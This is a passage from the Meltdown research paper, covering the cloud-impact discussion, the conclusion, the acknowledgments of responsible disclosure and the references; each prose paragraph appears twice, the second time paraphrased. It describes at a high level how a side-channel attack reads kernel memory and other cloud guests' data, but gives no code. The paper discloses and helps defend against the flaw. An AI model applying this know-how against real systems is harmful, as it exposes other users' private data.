Meltdown also heavily affects cloud providers, especially if the guests are not fully virtualized. For performance reasons, many hosting or cloud providers do not have an abstraction layer for virtual memory. In such environments, which typically use containers, such as Docker or OpenVZ, the kernel is shared among all guests. Thus, the isolation between guests can simply be circumvented with Meltdown, fully exposing the data of all other guests on the same host. For these providers, changing their infrastructure to full virtualization or using software workarounds such as KAISER would both increase the costs significantly.
Meltdown also severely affects cloud service providers, especially when guests are not fully virtualized. For performance reasons, many hosting or cloud providers have no abstraction layer for virtual memory. In such environments, which typically use containers such as Docker or OpenVZ, the kernel is shared among all guests. Thus, the isolation between guests can simply be circumvented with Meltdown, fully exposing the data of all other guests on the same host. For these providers, switching to full virtualization or deploying software workarounds such as KAISER would significantly increase costs.
Even if Meltdown is fixed, Spectre [19] will remain an issue. Spectre [19] and Meltdown need different defenses. Specifically mitigating only one of them will leave the security of the entire system at risk. We expect that Meltdown and Spectre open a new field of research to investigate to what extent performance optimizations change the microarchitectural state, how this state can be translated into an architectural state, and how such attacks can be prevented.
Even if Meltdown is fixed, Spectre [19] remains a problem. Spectre and Meltdown require different defenses, and fixing only one of them leaves the security of the whole system at risk. We expect Meltdown and Spectre to open a new field of research into CPU design: to what extent performance optimizations change the microarchitectural state, how that microarchitectural state can be translated into architectural state, and how such attacks can be prevented.

9. Conclusion

In this paper, we presented Meltdown, a novel software-based side-channel attack exploiting out-of-order execution on modern processors to read arbitrary kernel- and physical-memory locations from an unprivileged user space program. Without requiring any software vulnerability and independent of the operating system, Meltdown enables an adversary to read sensitive data of other processes or virtual machines in the cloud with up to 503 KB/s, affecting millions of devices. We showed that the countermeasure KAISER [8], originally proposed to protect from side-channel attacks against KASLR, inadvertently impedes Meltdown as well. We stress that KAISER needs to be deployed on every operating system as a short-term workaround, until Meltdown is fixed in hardware, to prevent large-scale exploitation of Meltdown.
In this paper, we described Meltdown, a new software-based side-channel attack that exploits out-of-order execution on modern processors to read arbitrary kernel and physical memory locations from an unprivileged user-space program. Without exploiting any software vulnerability and independent of the operating system, Meltdown allows an adversary to read sensitive data of other processes or virtual machines in the cloud at up to 503 KB/s, affecting millions of devices. We showed that KAISER [8], originally proposed to defend against side-channel attacks on KASLR, inadvertently impedes Meltdown as well. We recommend deploying KAISER on every operating system as a short-term workaround until Meltdown is fixed in hardware, to prevent large-scale exploitation.

Acknowledgments

We would like to thank Anders Fogh for fruitful discussions at BlackHat USA 2016 and BlackHat Europe 2016, which ultimately led to the discovery of Meltdown. Fogh [5] already suspected that it might be possible to abuse speculative execution in order to read kernel memory in user mode but his experiments were not successful. We would also like to thank Jann Horn for comments on an early draft. Jann disclosed the issue to Intel in June. The subsequent activity around the KAISER patch was the reason we started investigating this issue. Furthermore, we would like to thank Intel, ARM, Qualcomm, and Microsoft for feedback on an early draft.
We thank Anders Fogh for the fruitful discussions at BlackHat USA 2016 and BlackHat Europe 2016 that ultimately led to the discovery of Meltdown. Anders Fogh [5] already suspected that it might be possible to read kernel data in user mode by abusing speculative execution, but his experiments were not successful. We would also like to thank Jann Horn for his comments on early drafts. Jann Horn disclosed the problem to Intel in June, and the subsequent activity around the KAISER patch led us to investigate this issue. In addition, we appreciate the feedback given by Intel, ARM, Qualcomm, and Microsoft on an early draft.
We would also like to thank Intel for awarding us with a bug bounty for the responsible disclosure process, and their professional handling of this issue through communicating a clear timeline and connecting all involved researchers. Furthermore, we would also like to thank ARM for their fast response upon disclosing the issue.
We also thank Intel for awarding us a bug bounty for the responsible disclosure process and for handling the issue professionally, communicating a clear timeline and connecting all involved researchers. Additionally, we appreciate ARM's quick response when the issue was disclosed.
This work was supported in part by the European Research Council (ERC) under the European Union’s Horizon 2020 research and innovation programme (grant agreement No 681402).
This work was supported in part by the European Research Council (ERC) under the European Union's Horizon 2020 research and innovation programme (grant agreement No. 681402).

References:

[1] BENGER, N., VAN DE POL, J., SMART, N. P., AND YAROM, Y. “Ooh Aah… Just a Little Bit”: A small amount of side channel can go a long way. In CHES’14 (2014).
[2] CHENG, C.-C. The schemes and performances of dynamic branch predictors. Berkeley Wireless Research Center, Tech. Rep (2000).
[3] DEVIES, A. M. AMD Takes Computing to a New Horizon with Ryzen™ Processors, 2016.
[4] EDGE, J. Kernel address space layout randomization, 2013.
[5] FOGH, A. Negative Result: Reading Kernel Memory From User Mode, 2017.
[6] GRAS, B., RAZAVI, K., BOSMAN, E., BOS, H., AND GIUFFRIDA, C. ASLR on the Line: Practical Cache Attacks on the MMU. In NDSS (2017).
[7] GRUSS, D., LETTNER, J., SCHUSTER, F., OHRIMENKO, O., HALLER, I., AND COSTA, M. Strong and Efficient Cache Side-Channel Protection using Hardware Transactional Memory. In USENIX Security Symposium (2017).
[8] GRUSS, D., LIPP, M., SCHWARZ, M., FELLNER, R., MAURICE, C., AND MANGARD, S. KASLR is Dead: Long Live KASLR. In International Symposium on Engineering Secure Software and Systems (2017), Springer, pp. 161–176.
[9] GRUSS, D., MAURICE, C., FOGH, A., LIPP, M., AND MANGARD, S. Prefetch Side-Channel Attacks: Bypassing SMAP and Kernel ASLR. In CCS (2016).
[10] GRUSS, D., MAURICE, C., WAGNER, K., AND MANGARD, S. Flush+Flush: A Fast and Stealthy Cache Attack. In DIMVA (2016).
[11] GRUSS, D., SPREITZER, R., AND MANGARD, S. Cache Template Attacks: Automating Attacks on Inclusive Last-Level Caches. In USENIX Security Symposium (2015).
[12] HENNESSY, J. L., AND PATTERSON, D. A. Computer architecture: a quantitative approach. Elsevier, 2011.
[13] HUND, R., WILLEMS, C., AND HOLZ, T. Practical Timing Side Channel Attacks against Kernel Space ASLR. In S&P (2013).
[14] INTEL. Intel® 64 and IA-32 Architectures Optimization Reference Manual, 2014.
[15] IONESCU, A. Windows 17035 Kernel ASLR/VA Isolation In Practice (like Linux KAISER)., 2017.
[16] IRAZOQUI, G., INCI, M. S., EISENBARTH, T., AND SUNAR, B. Wait a minute! A fast, Cross-VM attack on AES. In RAID’14 (2014).
[17] JANG, Y., LEE, S., AND KIM, T. Breaking Kernel Address Space Layout Randomization with Intel TSX. In CCS (2016).
[18] JIMÉNEZ, D. A., AND LIN, C. Dynamic branch prediction with perceptrons. In High-Performance Computer Architecture, 2001. HPCA. The Seventh International Symposium on (2001), IEEE, pp. 197–206.
[19] KOCHER, P., GENKIN, D., GRUSS, D., HAAS, W., HAMBURG, M., LIPP, M., MANGARD, S., PRESCHER, T., SCHWARZ, M., AND YAROM, Y. Spectre Attacks: Exploiting Speculative Execution.
[20] KOCHER, P. C. Timing Attacks on Implementations of Diffie-Hellman, RSA, DSS, and Other Systems. In CRYPTO (1996).
[21] LEE, B., MALISHEVSKY, A., BECK, D., SCHMID, A., AND LANDRY, E. Dynamic branch prediction. Oregon State University.
[22] LEVIN, J. Mac OS X and iOS Internals: To the Apple's Core. John Wiley & Sons, 2012.
[23] LIPP, M., GRUSS, D., SPREITZER, R., MAURICE, C., AND MANGARD, S. ARMageddon: Cache Attacks on Mobile Devices. In USENIX Security Symposium (2016).
[24] LIU, F., YAROM, Y., GE, Q., HEISER, G., AND LEE, R. B. Last-Level Cache Side-Channel Attacks are Practical. In IEEE Symposium on Security and Privacy – SP (2015), IEEE Computer Society, pp. 605–622.
[25] LWN. The current state of kernel page-table isolation, Dec. 2017.
[26] MAURICE, C., WEBER, M., SCHWARZ, M., GINER, L., GRUSS, D., ALBERTO BOANO, C., MANGARD, S., AND RÖMER, K. Hello from the Other Side: SSH over Robust Cache Covert Channels in the Cloud. In NDSS (2017).
[27] MOLNAR, I. x86: Enable KASLR by default, 2017.
[28] OSVIK, D. A., SHAMIR, A., AND TROMER, E. Cache Attacks and Countermeasures: the Case of AES. In CT-RSA (2006).
[29] PERCIVAL, C. Cache missing for fun and profit. In Proceedings of BSDCan (2005).
[30] PHORONIX. Linux 4.12 To Enable KASLR By Default, 2017.
[31] SCHWARZ, M., LIPP, M., GRUSS, D., WEISER, S., MAURICE, C., SPREITZER, R., AND MANGARD, S. KeyDrown: Eliminating Software-Based Keystroke Timing Side-Channel Attacks. In NDSS’18 (2018).
[32] TERAN, E., WANG, Z., AND JIMÉNEZ, D. A. Perceptron learning for reuse prediction. In Microarchitecture (MICRO), 2016 49th Annual IEEE/ACM International Symposium on (2016), IEEE, pp. 1–12.
[33] TOMASULO, R. M. An efficient algorithm for exploiting multiple arithmetic units. IBM Journal of research and Development 11, 1 (1967), 25–33.
[34] VINTAN, L. N., AND IRIDON, M. Towards a high performance neural branch predictor. In Neural Networks, 1999. IJCNN’99. International Joint Conference on (1999), vol. 2, IEEE, pp. 868–873.
[35] YAROM, Y., AND FALKNER, K. Flush+Reload: a High Resolution, Low Noise, L3 Cache Side-Channel Attack. In USENIX Security Symposium (2014).
[36] YEH, T.-Y., AND PATT, Y. N. Two-level adaptive training branch prediction. In Proceedings of the 24th annual international symposium on Microarchitecture (1991), ACM, pp. 51–61.
[37] ZHANG, Y., JUELS, A., REITER, M. K., AND RISTENPART, T. Cross-Tenant Side-Channel Attacks in PaaS Clouds. In CCS’14 (2014).
